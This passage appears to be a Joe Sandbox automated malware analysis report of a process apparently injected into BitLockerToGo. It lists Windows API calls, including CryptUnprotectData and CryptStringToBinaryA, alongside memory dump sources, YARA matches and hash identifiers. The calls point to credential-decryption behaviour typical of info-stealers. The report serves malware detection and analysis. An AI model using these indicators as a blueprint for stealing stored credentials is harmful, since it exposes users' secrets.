                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000031CB000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000324A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836955286.000000000325C000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_2_2_3000000_BitLockerToGo.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2579439406-0
                                                                                                                                                                • Opcode ID: 1850763859c5524de26945a456762cd5d7788b75d0c07f790471f8f8981caee0
                                                                                                                                                                • Instruction ID: bc359deae4546f160639a5b684a210797261ff1ccedc9cbe697be80a0d1b6c85
                                                                                                                                                                • Opcode Fuzzy Hash: 1850763859c5524de26945a456762cd5d7788b75d0c07f790471f8f8981caee0
                                                                                                                                                                • Instruction Fuzzy Hash: 542192FC5032049FDB15FF69E688A8A3BF4BB09315F508579E90A8724CEBB85690CF45
                                                                                                                                                                APIs
                                                                                                                                                                • GetProcessHeap.KERNEL32(00000008,00000400,?,?,?,?,?,03007C90,80000001,030161C4,?,?,?,?,?,03007C90), ref: 0300724D
                                                                                                                                                                • RtlAllocateHeap.NTDLL(00000000), ref: 03007254
                                                                                                                                                                • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 03007281
                                                                                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000,?,?,?,?,?,03007C90,80000001,030161C4), ref: 030072A4
                                                                                                                                                                • LocalFree.KERNEL32(?,?,?,?,?,?,03007C90,80000001,030161C4,?,?,?,?,?,03007C90,?), ref: 030072AE
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000002.00000002.1836179324.0000000003000000.00000040.00000400.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                • Associated: 00000002.00000002.1836206485.000000000301E000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000302B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000305A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.0000000003085000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.0000000003088000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000308F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.0000000003092000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030B1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030BD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030E2000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030EF000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000310F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000311B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000031A5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000031C5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000031CB000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000324A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836955286.000000000325C000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_2_2_3000000_BitLockerToGo.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2609814428-0
                                                                                                                                                                • Opcode ID: ea10255525cd56306e39c79b699dff975053581ee899882e5075d0afc806cd49
                                                                                                                                                                • Instruction ID: e616e7c46e66148a1e7b2c038f01d53914c21279e7f059703be45c36046f3c1d
                                                                                                                                                                • Opcode Fuzzy Hash: ea10255525cd56306e39c79b699dff975053581ee899882e5075d0afc806cd49
                                                                                                                                                                • Instruction Fuzzy Hash: 0B0112B5A81208BBEB10DFD4DD4AF9D77B8EB44B04F108545FB05AB2C4D770BA008B65
                                                                                                                                                                APIs
                                                                                                                                                                • memset.VCRUNTIME140(?,000000FF,?), ref: 6CCE8A4B
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000002.00000002.1858482528.000000006CC71000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC70000, based on PE: true
                                                                                                                                                                • Associated: 00000002.00000002.1858461408.000000006CC70000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1858544781.000000006CCED000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1858572898.000000006CCFE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1858596249.000000006CD02000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_2_2_6cc70000_BitLockerToGo.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: memset
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2221118986-0
                                                                                                                                                                • Opcode ID: 83bd3679e087d2f8c0a363543460151d132c5b050c0c1d93b1d77d16f48f2b37
                                                                                                                                                                • Instruction ID: 2dcf0ff206d22aadd797cac2f628f20328b4128a65ac5fa3bc83a6a20a9e61e4
                                                                                                                                                                • Opcode Fuzzy Hash: 83bd3679e087d2f8c0a363543460151d132c5b050c0c1d93b1d77d16f48f2b37
                                                                                                                                                                • Instruction Fuzzy Hash: 99B1EA72E0121A8FDB14CF68CC91BD9B7B2FF9A314F1902A9C549DB791E7309985CB90
                                                                                                                                                                APIs
                                                                                                                                                                • memset.VCRUNTIME140(?,000000FF,?), ref: 6CCE88F0
                                                                                                                                                                • memset.VCRUNTIME140(?,000000FF,?,?), ref: 6CCE925C
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000002.00000002.1858482528.000000006CC71000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC70000, based on PE: true
                                                                                                                                                                • Associated: 00000002.00000002.1858461408.000000006CC70000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1858544781.000000006CCED000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1858572898.000000006CCFE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1858596249.000000006CD02000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_2_2_6cc70000_BitLockerToGo.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: memset
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2221118986-0
                                                                                                                                                                • Opcode ID: 79f258be636af245f773d231f88ec99e234031016a7ca9cdfbf0dc900f23d892
                                                                                                                                                                • Instruction ID: 568cdc2e11b7bf8859f967f907db85f7c13efa634840c82a11c38bee8148f4c4
                                                                                                                                                                • Opcode Fuzzy Hash: 79f258be636af245f773d231f88ec99e234031016a7ca9cdfbf0dc900f23d892
                                                                                                                                                                • Instruction Fuzzy Hash: 15B1C772E0110ACFDB14CF58CC91ADDB7B6EF89314F150269C949DBB85E730A989CB90
                                                                                                                                                                APIs
                                                                                                                                                                • CryptBinaryToStringA.CRYPT32(00000000,03005184,40000001,00000000,00000000,?,03005184), ref: 03018EC0
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000002.00000002.1836179324.0000000003000000.00000040.00000400.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                • Associated: 00000002.00000002.1836206485.000000000301E000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000302B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000305A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.0000000003085000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.0000000003088000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000308F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.0000000003092000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030B1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030BD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030E2000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030EF000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000310F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000311B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000031A5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000031C5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000031CB000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000324A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836955286.000000000325C000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_2_2_3000000_BitLockerToGo.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: BinaryCryptString
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 80407269-0
                                                                                                                                                                • Opcode ID: 507efe91556b7b4503763d48604e01eb5d3e98c9c46da2bd459b12786e89502f
                                                                                                                                                                • Instruction ID: 64d9cad7503527b98bd47b06947fbeb59203b6e0e1095bd34da727a3f7869217
                                                                                                                                                                • Opcode Fuzzy Hash: 507efe91556b7b4503763d48604e01eb5d3e98c9c46da2bd459b12786e89502f
                                                                                                                                                                • Instruction Fuzzy Hash: 70111874201208BFDB40DFA4E888FAB33EAAF89304F00D848F9198B240D735EA51CB60
                                                                                                                                                                APIs
                                                                                                                                                                • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,03004EEE,00000000,00000000), ref: 03009AEF
                                                                                                                                                                • LocalAlloc.KERNEL32(00000040,?,?,?,03004EEE,00000000,?), ref: 03009B01
                                                                                                                                                                • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,03004EEE,00000000,00000000), ref: 03009B2A
                                                                                                                                                                • LocalFree.KERNEL32(?,?,?,?,03004EEE,00000000,?), ref: 03009B3F
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000002.00000002.1836179324.0000000003000000.00000040.00000400.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                • Associated: 00000002.00000002.1836206485.000000000301E000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000302B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000305A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.0000000003085000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.0000000003088000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000308F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.0000000003092000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030B1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030BD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030E2000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030EF000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000310F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000311B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000031A5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000031C5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000031CB000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000324A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836955286.000000000325C000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_2_2_3000000_BitLockerToGo.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: BinaryCryptLocalString$AllocFree
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 4291131564-0
                                                                                                                                                                • Opcode ID: 543fc51dd9a013b546453f6df1b220861910d71e1bfde9da69af78e57de0088b
                                                                                                                                                                • Instruction ID: 020259e82f09d63907818ac852e29cd09fc125b72dec272144695887be10ad44
                                                                                                                                                                • Opcode Fuzzy Hash: 543fc51dd9a013b546453f6df1b220861910d71e1bfde9da69af78e57de0088b
                                                                                                                                                                • Instruction Fuzzy Hash: 0311A4B4241208AFEB10DF64D895FAA77B5FB89714F208058F9159F3D4C7B6A901CB50
                                                                                                                                                                APIs
                                                                                                                                                                • InitializeConditionVariable.KERNEL32(?), ref: 6CCB6D45
                                                                                                                                                                • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6CCB6E1E
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000002.00000002.1858482528.000000006CC71000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC70000, based on PE: true
                                                                                                                                                                • Associated: 00000002.00000002.1858461408.000000006CC70000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1858544781.000000006CCED000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1858572898.000000006CCFE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1858596249.000000006CD02000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_2_2_6cc70000_BitLockerToGo.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ConditionExclusiveInitializeLockReleaseVariable
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 4169067295-0
                                                                                                                                                                • Opcode ID: 1ed5c4fd4758dcf3de778480772f92004f547a6eee4f1f1a16d16b2fb2a72439
                                                                                                                                                                • Instruction ID: 2c28f4f53964c312642d1042ce15deff20f23a2e74ba1ead34a8c2f081492c38
                                                                                                                                                                • Opcode Fuzzy Hash: 1ed5c4fd4758dcf3de778480772f92004f547a6eee4f1f1a16d16b2fb2a72439
                                                                                                                                                                • Instruction Fuzzy Hash: 1EA18F706187858FDB15CF24C4947AEFBF2BF89308F05491DE88A97751EB70A849CB92
                                                                                                                                                                APIs
                                                                                                                                                                • CoCreateInstance.COMBASE(0301E118,00000000,00000001,0301E108,00000000), ref: 03013758
                                                                                                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 030137B0
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000002.00000002.1836179324.0000000003000000.00000040.00000400.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                • Associated: 00000002.00000002.1836206485.000000000301E000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000302B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000305A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.0000000003085000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.0000000003088000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000308F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.0000000003092000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030B1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030BD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030E2000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030EF000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000310F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000311B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000031A5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000031C5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000031CB000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000324A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836955286.000000000325C000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_2_2_3000000_BitLockerToGo.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ByteCharCreateInstanceMultiWide
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 123533781-0
                                                                                                                                                                • Opcode ID: ae54d92f90cdb39ef3a38678b9904639e8b57aed524a297feb4c8085694c5235
                                                                                                                                                                • Instruction ID: fcd247ac03e5bf48f6dd7830db8bbb988c4ea074799012a00f69ea3e6a7c36b7
                                                                                                                                                                • Opcode Fuzzy Hash: ae54d92f90cdb39ef3a38678b9904639e8b57aed524a297feb4c8085694c5235
                                                                                                                                                                • Instruction Fuzzy Hash: 0841E974A40A289FDB24DB58CC95BDBB7B5BB48702F4081D8E618AB2D0D7B16EC5CF50
                                                                                                                                                                APIs
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000002.00000002.1858482528.000000006CC71000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC70000, based on PE: true
                                                                                                                                                                • Associated: 00000002.00000002.1858461408.000000006CC70000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1858544781.000000006CCED000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1858572898.000000006CCFE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1858596249.000000006CD02000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_2_2_6cc70000_BitLockerToGo.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: __aulldiv
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3732870572-0
                                                                                                                                                                • Opcode ID: db5f37eeb5151a0c79d842b80d44bf315513e08190c289969ce06011ea5de0b8
                                                                                                                                                                • Instruction ID: f3ed4ed79f962984118f592232739b6c5372448fc76d142887d3b21db2c8004c
                                                                                                                                                                • Opcode Fuzzy Hash: db5f37eeb5151a0c79d842b80d44bf315513e08190c289969ce06011ea5de0b8
                                                                                                                                                                • Instruction Fuzzy Hash: A2327131F001198BDF18CE9DC8A1BAEB7B2FB88710F16953AD506BB790D634AD45CB91
                                                                                                                                                                APIs
                                                                                                                                                                • memcmp.VCRUNTIME140(?,?,6CC84A63,?,?), ref: 6CCB5F06
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000002.00000002.1858482528.000000006CC71000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC70000, based on PE: true
                                                                                                                                                                • Associated: 00000002.00000002.1858461408.000000006CC70000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1858544781.000000006CCED000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1858572898.000000006CCFE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1858596249.000000006CD02000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_2_2_6cc70000_BitLockerToGo.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: memcmp
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1475443563-0
                                                                                                                                                                • Opcode ID: b6c66343ec6b597a60b3cf3ff968b1ffc34eb9386b14f54dea1d2eb41a4505d7
                                                                                                                                                                • Instruction ID: ef82dfe1e138ae6b0d92f2e0c17c10ba828aa625725eb572e638dda320a6ae05
                                                                                                                                                                • Opcode Fuzzy Hash: b6c66343ec6b597a60b3cf3ff968b1ffc34eb9386b14f54dea1d2eb41a4505d7
                                                                                                                                                                • Instruction Fuzzy Hash: A9C1B075D012598BCB04CFA5C5906EEFBB2FF8A318F28425DD8557BB44E732A806CB90
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 0301A740: lstrcpy.KERNEL32(03020AEF,00000000), ref: 0301A788
                                                                                                                                                                • GetSystemTime.KERNEL32(?,03549910,030205AE,?,?,?,?,?,?,?,?,?,03004963,?,00000014), ref: 03018B86
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000002.00000002.1836179324.0000000003000000.00000040.00000400.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                • Associated: 00000002.00000002.1836206485.000000000301E000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000302B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000305A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.0000000003085000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.0000000003088000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000308F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.0000000003092000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030B1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030BD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030E2000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030EF000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000310F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000311B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000031A5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000031C5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000031CB000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000324A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836955286.000000000325C000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_2_2_3000000_BitLockerToGo.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: SystemTimelstrcpy
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 62757014-0
                                                                                                                                                                • Opcode ID: 3ae9025845a1d0777aa489e8a0feba7f08abea8c2f8da972926613014c9cd532
                                                                                                                                                                • Instruction ID: 6f7a296b8a1472460df7ea6eedf391f0357e2d75b3a46483ac3e2eee63a94160
                                                                                                                                                                • Opcode Fuzzy Hash: 3ae9025845a1d0777aa489e8a0feba7f08abea8c2f8da972926613014c9cd532
                                                                                                                                                                • Instruction Fuzzy Hash: 6711467AE022089FCB05EFA8D8919EF77B9EF98210F44C159E5166B250DF306A15CBB0
                                                                                                                                                                APIs
                                                                                                                                                                • SetUnhandledExceptionFilter.KERNEL32(Function_0001CEA8), ref: 0301CEEF
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000002.00000002.1836179324.0000000003000000.00000040.00000400.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                • Associated: 00000002.00000002.1836206485.000000000301E000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000302B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000305A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.0000000003085000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.0000000003088000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000308F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.0000000003092000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030B1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030BD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030E2000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030EF000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000310F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000311B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000031A5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000031C5000.00000040.00000400.00020000.00000000.sdmpDownload File
